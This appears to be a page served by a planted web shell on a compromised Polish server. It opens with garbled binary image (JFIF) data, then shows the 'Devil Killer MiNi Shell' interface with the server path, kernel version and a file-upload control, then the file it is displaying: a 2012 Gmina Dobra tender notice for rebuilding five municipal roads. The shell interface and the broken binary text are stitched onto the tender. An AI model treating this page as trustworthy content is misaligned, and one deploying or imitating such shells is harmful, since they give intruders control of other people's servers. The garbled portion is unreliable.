JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120524/115927-N-2012.html

<p class="kh_header"><b>Dobra: I część: Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb
II część Przebudowa drogi gminnej w miejscowości Długa Wieś na odcinku 500,0 mb
III część Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 300,0 mb
IV część Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 250,0 mb
V część Przebudowa drogi gminnej w miejscowości Skęczniew na części działki nr 155/3 na odcinku 131,0 mb</b><br>
<b>Numer ogłoszenia: 115927 - 2012; data zamieszczenia: 24.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobra , plac Wojska Polskiego 10, 62-730 Dobra, woj. wielkopolskie, tel. 0-63 279-90-11, faks 0-63 279-90-11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> I część: Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb
II część Przebudowa drogi gminnej w miejscowości Długa Wieś na odcinku 500,0 mb
III część Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 300,0 mb
IV część Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 250,0 mb
V część Przebudowa drogi gminnej w miejscowości Skęczniew na części działki nr 155/3 na odcinku 131,0 mb.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dla inwestycji pn.:1.Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb; obejmuje wykonanie następujących robót budowlanych: Przedmiotem  niniejszego opracowania jest  projekt  techniczny  na przebudowę  drogi gminnej w  miejscowości  Chrapczew.  Długość  projektowanego  odcinka drogi  wynosi  0.500  km. Zakres  robót  przewidziany  niniejszym  projektem  obejmuje: roboty  przygotowawcze  w  granicach  projektowanego  pasa  drogowego w tym roboty rozbiórkowe  oraz wycinka drzew i krzewów wykonanie robót  ziemnych w wykopie  i nasypie przebudowę  przepustu wykonanie podbudowy  z  kruszywa łamanego stabilizowanego  mechanicznie ułożenie  warstwy  ścieralnej  nawierzchni  z  betonu  asfaltowego budowę  zjazdów uzupełnienie  poboczy wykonanie oznakowania  pionowego. URZĄDZENIA   OBCE W  ciągu  projektowanego  przedsięwzięcia występuje  liczne  uzbrojenie  podziemne i napowietrzne w tym sieć wodociągowa, linia  energetyczna oraz telekomunikacyjna. Przebieg  urządzeń  podziemnych i napowietrznych  pokazują  mapy sytuacyjno-wysokościowe. Przy prowadzeniu  robót  należy dostosować  się  do  zaleceń  przedstawionych w  Opinii  Zespołu Uzgadniania Dokumentacji. Lokalizacja sieci telekomunikacyjnej koliduje   z  projektowaną przebudową  drogi. Realizacja  inwestycji możliwa  jest  po pełnieniu  warunków podanych  w  uzgodnieniu /załącznik  do  dokumentacji/ Telekomunikacji Polskiej  we Wrocławiu. Miejsca skrzyżowań z infrastrukturą  telekomunikacyjną  należy  zabezpieczyć  rurą  ochronną  dwudzielną  grubościenną. Należy ustalić  dokładnie  lokalizację  wodociągu  i w jego obrębie  oraz znaków  geodezyjnych wszystkie roboty, a  szczególnie  ziemne  prowadzić  ręcznie, pod  nadzorem  i w porozumieniu z właścicielami tych urządzeń  aby  uniknąć uszkodzeń. STAN PROJEKTOWANY Parametry  techniczne  i  dane  wyjściowe kategoria  drogi gminna klasa drogi D- dojazdowa prędkość projektowa Vp - 30 km/h kategoria  ruchu KR 1 przekrój drogowy szerokość  jezdni 4.00 m szerokość  podbudowy 4.30 m szerokość korony  6.00 m szerokość  poboczy 1.00 m spadek  jezdni 2% obciążenie  nawierzchni  80kN/oś warunki  wodne przyjęto przeciętne warunki  gruntowe przyjęto - grunty  niewysadzinowe nośność  podłoża przyjęto grupę  G1 Rozwiązania  sytuacyjne Usytuowanie  drogi  w  istniejącym  pasie  komunikacyjnym  przedstawiono  na  mapach  sytuacyjno - wysokościowych  w  skali 1:1000. Projektowana  droga  posiada  jeden  łuk poziomy normatywny  w km 0+234. Przebieg  projektowanej  drogi starano  się  dostosować   do  istniejącej  drogi  o  nawierzchni  gruntowej.  Realizacja  przedsięwzięcia nie  wymaga  zajęcia  nieruchomości  przyległych  do  drogi. Rozwiązania  wysokościowe Rozwiązania  wysokościowe planowanej  inwestycji  wykonano  w  oparciu  o mapy  sytuacyjno - wysokościowe do  celów  projektowych  wykonane  przez  uprawnionego  geodetę . W  opracowaniu  przyjęto  następujące   założenia: projektowana  oś  drogi  winna  być zbliżona  do istniejącej  osi drogi  gruntowej  zachowanie  normatywnych  pochyleń. Początek   projektowanej  drogi  dowiązano  wysokościowo  do    wysokości nawierzchni  bitumicznej  drogi  gminnej w  miejscowości Chrapczew. Wysokości na  projektowanej  jezdni  wyznaczono w  oparciu o: rzędne  wysokościowe  istniejących  zjazdów  gospodarczych rzędne  wysokościowe  przyległych terenów uzyskanie  prawidłowych  pochyleń  dla  odwodnienia  nawierzchni Niweletę  starano się  zaprojektować w  nawiązaniu  do  istniejącej  niwelety uwzględniając  wyrównanie  nierówności w  profilu  podłużnym  i  wynosząc ją  w  miarę  możliwości  o  projektowaną grubość konstrukcji  drogi. Przebieg  projektowanej  niwelety  drogi  przedstawia  rysunek - profil  podłużny. Odwodnienie Istniejąca  droga  gminna posiada  odwodnienie  powierzchniowe.  Od km  0+050 do km 0+280 po stronie lewej oraz od km 0+000 do km 0+090 po stronie  prawej drogi  znajduje  się rów, który jest zamulony i  w chwili  obecnej  nie spełnia prawidłowo swej  funkcji. Projektuje  się  odwodnienie  korpusu drogi za pomocą  spadków poprzecznych i podłużnych. Istniejące rowy wymagają  oczyszczenia. W  celu zapewnienia  prawidłowego  odwodnienia  pasa  drogowego w  km 0+074 zaprojektowano przebudowę  istniejącego  przepustu średnicy  60 cm  z  rur  WIPRO  o  długości  8.00 m.  Woda  zostanie  odprowadzona  do  istniejącego  cieku  naturalnego. Konstrukcja  nawierzchni Na  całej  długości  projektowanej  drogi  przyjęto  następującą  konstrukcję  jezdni  i  korony: kategoria  ruchu KR1 nośność  podłoża  G1 warunki  wodne  przeciętne Konstrukcja  nawierzchni  jezdni: 5 cm  warstwa  ścieralna  z  betonu  asfaltowego AC 11 S 50/70 dla KR1  wg  normy PN-EN 13108 z 2008 r. połączenie  międzywarstwowe  - skropienie nawierzchni kationową emulsją asfaltową 0.7 kg/m2 20 cm  podbudowa z kruszywa  łamanego melafir , bazalt  wg normy PN-S-06102 z grudnia 1997 r. Przekrój  poprzeczny Na  projektowanej  drodze  przyjęto  następujący  przekrój: projektowana  szerokość  jezdni -4.00 m spadek   jezdni  dwustronny -2% pobocza   o  szerokości -1.00 m spadki  poboczy   o wartości - 6% Roboty  ziemne Przewiduje  się  wykonanie  koryta  pod w-wy  konstrukcyjne  jezdni  za  pomocą  równiarki. Urobek wbudowany  zostanie  gruntów  pobocze gruntów  ewentualny  nadmiar wywieziony  na  skazane  przez  inwestora  miejsce. Zagęszczenie   gruntów podłoża -  istniejące  podłoże  gruntowe  wyprofilować i  bezwzględnie  zagęścić   przy  użyciu  walca  wibracyjnego  celem  uzyskania  na  całej  powierzchni  wymaganego  wskaźnika  zagęszczenia  wg PN-S-02205 ,1998 dla głębokości  podłoża 0.0 - 0.5 wskaźnik 1.0  0.5 - 1.2 0.97 powyżej 1.2 0.95. Wszystkie  prowadzone  wykopy   należy  wykonywać  mechanicznie , jedynie  w  obrębie  urządzeń  obcych  -  ręcznie. Konstrukcja  poboczy Pobocza  należy  wykonać  z  gruntu  rodzimego pochodzącego  koryta drogi  oraz materiału dowiezionego umocnionego  pospółką , zagęszczonego  przy  pomocy  walca  ogumionego. Zjazdy W   ciągu  projektowanej  inwestycji  zaprojektowane  zostały  zjazdy  do  obsługi  przyległych  nieruchomości.  Dopuszcza  się  możliwość zmiany lokalizacji  zjazdów  do  poszczególnych nieruchomości  na  etapie  budowy. Zaprojektowano   5  szt  zjazdów z rurami   oraz  3 szt  bez  rur. Na  zjazdach projektuje  się  wykonanie  jezdni  o szerokości 4.00 m  oraz  poboczy  o szerokości  2x1.00 m. Przecięcie  krawędzi nawierzchni  zjazdu i drogi  wyokrąglić należy łukiem kołowym o promieniu 3.00 m Ścianki  czołowe zjazdów  wykonać  należy  z  darniny. Na  zjazdach  zaprojektowano   podbudowę  z kamienia  łamanego stabilizowanego mechanicznie  oraz  nawierzchnię żwirową II Przebudowa drogi gminnej w miejscowości Długa Wieś na odcinku 500,0 mb; przedmiotem opracowania jest przebudowa drogi wraz z miejscami postojowymi. Kolejność realizacji zadania W pierwszej kolejności przebudowane zostanie włączenie do drogi powiatowej. Następnie wykonanie na całości warstwy wzmacniająco wyrównawczej i ułożenie betonu asfaltowego. W dalszej kolejności wykonane miejsca postojowe z płyt ażurowych i chodnik. 7. Ukształtowanie terenu Teren płaski , roboty ziemne ograniczają się do wykonania koryta pod projektowane włączenie do drogi powiatowej i miejsca postojowe. 8. Istniejąca zabudowa Od km 0+000 do km 0+150 przy przebudowywanej drodze z lewej strony znajduje się cmentarz na pozostałym odcinku występują pola uprawne. Od km 0+040 po prawej stronie przebudowywanej drogi na odcinku 50 m znajdują się zabudowania gospodarcze. 9. Cel  opracowaniaCelem opracowania jest poprawa bezpieczeństwa ruchu i warunków komunikacyjnych mieszkańców. Określenie warunków technicznych jakim powinna odpowiadać przebudowywana droga wraz z miejscami postojowymi , zjazdami . Określenie zakresu i cen projektowanych robót. 10. Opis stanu istniejącego Teren na którym projektuje się przebudowę drogi wraz z miejscami postojowymi znajduje się na działkach których właścicielem /władającym/ jest gmina Dobra i mieści się w pasie drogowym drogi gminnej działki nr 52.1866. Teren za pasem drogowym na odcinku 0+150 z lewej strony jest ogrodzony murem przy cmentarzu a z prawej zabudowaniami gospodarczymi i jednorodzinnymi. Na pozostałych graniczy z polami. Wzdłuż drogi występują odcinkami rowy drogowe wymagające odtworzenia. Na terenie objętym opracowaniem występuje uzbrojenie sieć wodociągowa.Teren równinny. 11. Zajęcie terenu Zaprojektowana przebudowa drogi realizowana będzie w pasie drogowym na działkach nr 52,1866 będących własnością inwestora Zestawienie wymiarów długość drogi- 500,0 m powierzchnia jezdni 2230,0 m2 szerokość jezdni - 4,0 m powierzchnia chodnika z kostki betonowej -130,0 m2 z betonuasfaltowego -96,0 m2 zjazdy powierzchnia - 180,0m2 szerokość poboczy gruntowych 1,0 m 12. Projektowana nawierzchnia DROGA odcinek 0+032 warstwa ścieralna z betonu asfaltowego KR1 gr. 5 cm górna warstwa podbudowy tłuczniowej 0/31,5 gr. 5 cm podbudowa zasadnicza z kruszywa łamanego lub naturalnego stabilizowanego mechanicznie lub tłucznia kamiennego 31,5-60 gr. 15 cm warstwa odsączająca z piasku średnioziarnistego gr. 15 cm Razem 40 cm DROGA odcinek 032+ 500 warstwa ścieralna z betonu asfaltowego KR1 gr. 5 cm górna warstwa podbudowy tłuczniowej 0/31,5 gr. 5 cm warstwa o podbudowy istniejąca nawierzchnia Razem 10 cm CHODNIKI kostka bet. wibroprasowana k.szary gr. 6 cm podsypka cementowo-piaskowa 1:4 gr. 5 cm podsypka piaskowa gr. 10 cm Razem 21 cm ZJAZDY kostka bet. wibroprasowana k. czerwony gr. 8 cm podsypka cementowo-piaskowa 1:4 gr. 3 cm podbudowa z betonu B-10C810 gr 15 cm warstwa odsączająca gr. 15 cm Razem 41 cm MIEJSCA POSTOJOWE płyta prefabrykowana ażurowa 60x40 kol. czerw. lub szara gr. 8 cm podbudowa zasadnicza z kruszywa łamanego lub tłucznia gr. 15 cm warstwa odsączajaca z piasku średnioziarnistego gr. 15 cm Razem 38 cm Obramowanie od strony jezdni i miejsc postojowych wykonać z krawężnika ulicznego betonowego wibroprasowanego 15 x30 x100 cm na ławie betonowej z oporem. Odwodnienie Sposób odprowadzenia wód opadowych nie ulega zmianie.Wody opadowe odprowadzone powierzchniowo do istniejących rowów drogowych oraz na przyległe tereny 14. Obiekty podlegające ochronie Teren na którym realizowana będzie inwestycja nie jest wpisany do Rejestru Zabytków oraz nie podlega ochronie na podstawie ustaleń Miejscowego Planu  Zagospodarowania Przestrzennego. 15. Wpływ eksploatacji górniczej Teren objęty opracowaniem nie znajduje się na terenie oddziaływania eksploatacji górniczej. 16. Ochrona środowiska Inwestycja nie będzie znacząco oddziaływać na środowisko III Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 300,0 mb Przedmiotem niniejszego opracowania jest projekt budowlany  na przebudowę drogi gminnej w miejscowości Rzymsko na odcinku 300,0mb. W chwili obecnej droga posiada nawierzchnię tłuczniową, co stanowi duże utrudnienie w ruchu i stanowi dużą uciążliwość dla mieszkańców posesji  zlokalizowanych przy ww drodze. Inwestycja zlokalizowana jest na terenie Gminy Dobra, obręb Rzymsko, na nieruchomościach oznaczonych numerem ewidencyjnym gruntu dz. nr 30,13. Początek projektowanej drogi gminnej stanowi skrzyżowanie  z drogą krajową nr 83 Turek - Dobra - Warta. Zakres opracowania. Projekt na przebudowę drogi gminnej w miejscowości Rzymsko na odcinku 300,0mb  zawiera: część opisową: opis techniczny, opis planu zagospodarowania terenu,  informacja o planowanym przedsięwzięciu, informacja bezpieczeństwa i ochrony zdrowia część rysunkową: plan sytuacyjny w skali 1:1000, przekroje poprzeczne, przekrój podłużny, szczegóły przepustów przedmiar robót uzgodnienia zakres projektu obejmuje: rozwiązania sytuacyjno - wysokościowe Stan istniejący. Droga przewidziana do budowy zlokalizowana jest na terenie gminy Dobra w m. Rzymsko i posiada w chwili obecnej nawierzchnię tłuczniową, co stanowi dużą uciążliwość dla mieszkańców posesji przyległych do drogi oraz stwarza zagrożenie dla bezpieczeństwa ruchu. Stan projektowany. Projekt przewiduje przebudowę drogi gminnej o nawierzchni tłuczniowej na drogę o nawierzchni z betonu asfaltowego o szerokości: od km 0+000 do km 0+020 - 6,0mb od km 0+020 do km 0+300 - 4,0mb. Parametry techniczne projektowanej drogi. Projektuje się następujące parametry techniczne drogi: prędkość projektowa 40kmh kategoria ruchu KR1-KR2 kategoria ruchu  KR3 w pasie do drogi krajowej długość drogi 300,0mb szerokość jezdni od km  0+000 do km 0+020 jezdni - 6,0mb od km 0+020 do km 0+300 - 4,0mb szerokość poboczy 2x0,75m  Rozwiązanie sytuacyjne. Usytuowanie drogi w istniejącym pasie komunikacyjnym przedstawiono na aktualnych mapach sytuacyjno - wysokościowych w skali 1:1000 PLAN SYTUACYJNY. Przebieg drogi dostosowano do istniejącej drogi. Oś projektowanej  drogi pokrywa się z istniejącą osią drogi o nawierzchni tłuczniowej.  Początek i koniec projektowanego do przebudowy odcinka drogi gminnej został przedstawiony na planie sytuacyjnym w skali 1:1000. Droga w przekroju poprzecznym. Przekrój drogowy dwustronny  2% Pochylenie poprzeczne poboczy na prostej   6%  Przekroje konstrukcyjne Konstrukcja  nawierzchni drogi gminnej w pasie drogi krajowej nr 83:dolna w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie melafir, bazalt, granit - gr. 15cm górna w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie melafir, bazalt, granit - gr. 8 cm podbudowa zasadnicza z betonu asfaltowego KR3 AC25P wg PN-EN 13108-1 - g.r 13 cm w -wa ścieralna z betonu asfaltowego KR3 AC11S wg PN-EN 13108-1 gr. 5 cm  Konstrukcja  nawierzchni drogi gminnej w pasie drogi gminnej: w-wa podbudowy z kruszywa łamanego stabilizowanego mechanicznie melafir, bazalt, granit - gr. 20cm w -wa ścieralna z betonu asfaltowego KR1 AC11S wg PN-EN 13108-1 gr. 5 cm Konstrukcja  poboczy Pobocza  o grubości 10 cm należy wykonać z materiału pozyskanego z wykonania koryta pod w-wy konstrukcyjne nawierzchni na istniejącej drodze tłuczniowej a następnie  zagęścić za pomocą walca wibracyjnego lub płyty wibracyjnej. Roboty ziemne. Projekt przewiduje wykonanie robót ziemnych związanych z przedłużeniem przepustu wzdłuż drogi krajowej nr 83,  wykonanie koryta pod w-wy konstrukcyjne nawierzchni oraz oczyszczenie istniejących rowów przydrożnych. Odwodnienie. Projektuje się odwodnienie powierzchniowe za pomocą spadków podłużnych i poprzecznych do oczyszczonych rowów przydrożnych. Przy oczyszczaniu rowów należy rozebrać istniejące przepustu pod zjazdami i ułożyć nowe przepusty rurowe PCV o średnicy 300mm - rura dwuścienna karbowana lita SN 12. Na wjazdach należy ułożyć nawierzchnię z kruszywa łamanego stabilizowanego mechanicznie 0-31,5mm - przy  grubości- wy 10cm. W celu prawidłowego odwodnienia korpusu drogi w pasie drogi krajowej projektuje się przedłużenie istniejącego przepustu rurowego o średnicy 50cm o 2mb z rur PEHD. Pod przedłużeniem przepustu projektuje się wykonanie ławy fundamentowej z betonu B-10 gr.15cm oraz wykonanie ścianki czołowej przepustu o średnicy 50 cm  z betonu B-20 od strony przedłużanego przepustu. Projekt przewiduje zasypanie przepustu materiałem dowiezionym Po,Pr,Ps wraz z zagęszczeniem wykopu pod przepust warstwami. Urządzenia obce. Przy wykonywaniu robót należy dostosować się do zaleceń przedstawionych w Opinii ZUD. IV Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 250,0 mb Przedmiotem opracowania jest przebudowa drogi gminnej w miejscowości Rzymsko roboty pomiarowe - 250,0m - wykonanie podbudowy z kruszywa łamanego - warstwa górna po zagęszczeniu gr. 5 cm - 940,00m2, wykonanie nawierzchni z asfaltobetonu dla KR1 z warstwy ścieralnej - grubość po zagęszczeniu  5 cm 125kg/m2 - 750,00 m2  wykonanie poboczy  z dowozem gruntu na uzupełnienie gr.15 cm  - 650,0m2 rozścielanie i zagęszczanie mechaniczne zjazdów na posesje gr. 15 cm po zagęszczeniu z gruntu dowożonego - 80,0m2 Projekt drogowy niniejszego opracowania obejmuje przebudowę drogi gminnej o długości 250,0mb i szerokości 3,0m. Przebudowa drogi obejmuje roboty związane z wykonaniem, konstrukcji nawierzchni oraz uzyskanie prawidłowych spadków poprzecznych i podłużnych, wykonanie nawierzchni jezdni z betonu asfaltowego dla KR-1. Projekt obejmuje wykonanie mijanki. Dla projektowanej drogi przyjęto następujące parametry techniczne: długość - 250,0 m powierzchnia jezdni - 750,00 m2 klasa drogi D - dojazdowa prędkość projektowa 40 km/h poza terenem zabudowanym, 30km/h w terenie zabudowanym przekrój poprzeczny jednojezdniowy drogowy szerokość jezdni 3,0 m szerokość poboczy 2 x 1,00 m odwodnienie powierzchniowe do rowów drogowych nawierzchnia gr. 5 cm z betonu asfaltowego dla KR1, włączenie do drogi krajowej KR3 , podbudowa z tłucznia kamiennego. Przebieg trasy podyktowany został istniejącą drogą żwirową i koroną drogi. V Przebudowa drogi gminnej w miejscowości Skęczniew na części działki nr 155/3 na odcinku 131,0 mb Przedmiotem niniejszego opracowania jest projekt budowlany  na remont odcinka drogi  gminnej m. Skęczniew na części działki nr 155/3. W chwili obecnej droga posiada nawierzchnię bitumiczną z licznymi nierównościami w profilu podłużnym i poprzecznym co stanowi zagrożenie dla ruchu. Projektowana droga do remontu zlokalizowana jest na terenie Powiatu Tureckiego, na terenie Gminy Dobra, obręb Skęczniew. Wykaz nieruchomości, na których zlokalizowany jest odcinek drogi do remontu: Gmina Dobra, obręb Skęczniew dz. nr 155/3 Zakres robót przewidziany niniejszym projektem obejmuje: 1.roboty pomiarowe 2.roboty rozbiórkowe 3. ścinka obustronna poboczy  4. wykonanie wykopów pod koryto 5. profilowanie podłoża pod w-wy konstrukcyjne nawierzchni 6. podbudowa z kruszywa łamanego stabilizowanego mechanicznie bazalt, melafir, granit o uziarnieniu 0-31,5mm - grubości 20cm 7.w-wa wiążąca nawierzchni z betonu asfaltowego KR1-KR2 wg PN-S-96025 z lipca 2000r. - gr. 4 cm 8.mechaniczne oczyszczenie nawierzchni bitumicznej 9.skropienie nawierzchni emulsją asfaltową w ilości 0,5kgm2 10. w-wa ścieralna nawierzchni z betonu asfaltowego KR1-KR2 wg PN-S-96025 z lipca 2000r. w ilości 125kg/m2 11.uzupełnienie poboczy materiałem dowiezionym Po,Pr,Ps - gr. 10 cm 12.plantowanie, obrobienie na czysto poboczy 13. oczyszczenie rowu przy skrzyżowaniu z drogą wojewódzką 14. oczyszczenie przepustu pod droga gminną Stan istniejący. Droga przewidziana do budowy zlokalizowana jest na terenie gminy Dobra w m. Skęczniew. W chwili obecnej droga posiada nawierzchnię bitumiczną z licznymi nierównościami w profilu podłużnym i poprzecznym co stanowi zagrożenie dla ruchu.  Stan techniczny drogi określa się jako zły. W chwili obecnej droga posiada nawierzchnię jezdni bitumiczną z licznymi nierównościami w profilu podłużnym i poprzecznym, które stanowią zagrożenie dla ruchu. Parametry techniczne istniejącej drogi: kategoria drogi gminna klasa drogi D- dojazdowa przekrój  uliczny w krawężniku szerokość jezdni 6,00m szerokość poboczy 2x1,0m Parametry techniczne projektowanej drogi. Dla projektowanej drogi przyjęto następujące parametry techniczne: kategoria drogi droga gminna klasa drogi D- dojazdowa prędkość projektowa 40km/h kategoria ruchu  KR1-KR2 przekrój: uliczny w krawężniku szerokość drogi  6,00m szerokość poboczy 2x1,0m długość odcinka 131,0mb Projekt przewiduje rozebranie i odtworzenie podbudowy w miejscach utraty nośności oraz ułożenie nowej nawierzchni na istniejącej drodze. Początek projektowanego odcinka drogi stanowi koniec pasa drogowego drogi wojewódzkiej nr 478  a koniec skrzyżowanie z droga dojazdową do osiedla mieszkaniowego. Rozwiązanie sytuacyjne. Usytuowanie drogi w istniejącym pasie komunikacyjnym przedstawiono na aktualnych mapach sytuacyjno - wysokościowych w skali 1:1000 PLAN SYTUACYJNY. Przebieg drogi dostosowano do istniejącej drogi. Oś projektowanej  do remontu drogi pokrywa się z istniejącą osią drogi. Przekroje konstrukcyjne Konstrukcja nawierzchni drogi:  warstwa ścieralna z betonu asfaltowego 0/12,8mm dla KR1 lub KR2 wg normy PN-S-96025 z lipca 2000 r. o grubości 5 cm po zagęszczeniu średnio 125kg/m2.Konstrukcja nawierzchni drogi w miejscach utraty nośności: podbudowa z kruszywa łamanego stabilizowanego mechanicznie bazalt, melafir, granit o uziarnieniu 0-31,5mm -  w-wa grubości 20cm w-wa wiążąca nawierzchni z betonu asfaltowego KR1-KR2 wg PN-S-96025 z lipca 2000r. - gr. 4 cm w-wa ścieralna nawierzchni z betonu asfaltowego KR1-KR2 wg PN-S-96025 z lipca 2000r. - gr. 5 cm Konstrukcja poboczy: Projektuje się uzupełnienie  poboczy materiałem dowiezionym Po,Pr o grubości 10cm wraz z dowiezieniem i zagęszczeniem poboczy za pomocą walca wibracyjnego lub płyty wibracyjnej. Roboty ziemne. Projektuje się roboty ziemne związane z wykonaniem koryta pod w-wy konstrukcyjne nawierzchni drogi oraz z profilowaniem nawierzchni pod w-wy konstrukcyjne nawierzchni. Projekt przewiduje roboty ziemne związane z oczyszczeniem rowu w granicy pasa drogi gminnej przy skrzyżowaniu z drogą wojewódzką nr 478 (strona prawa) oraz oczyszczenie przepustu pod droga gminną. Projekt przewiduje rozbiórkę krawężnika  na łuku str. prawa przy skrzyżowaniu z droga wojewódzka oraz wykonanie skarpy rowu i  pobocza z materiału dowiezionego Po, Pr, Pswraz z  zakupem i dowozem gruntu. Na pozostałym odcinku drogi przewidzianej do remontu krawężnik pozostaje bez zmian. Odwodnienie.Projektuje się odwodnienie powierzchniowe za pomocą spadków podłużnych i poprzecznych do rowów przydrożnych i na tereny przyległe do drogi. Urządzenia 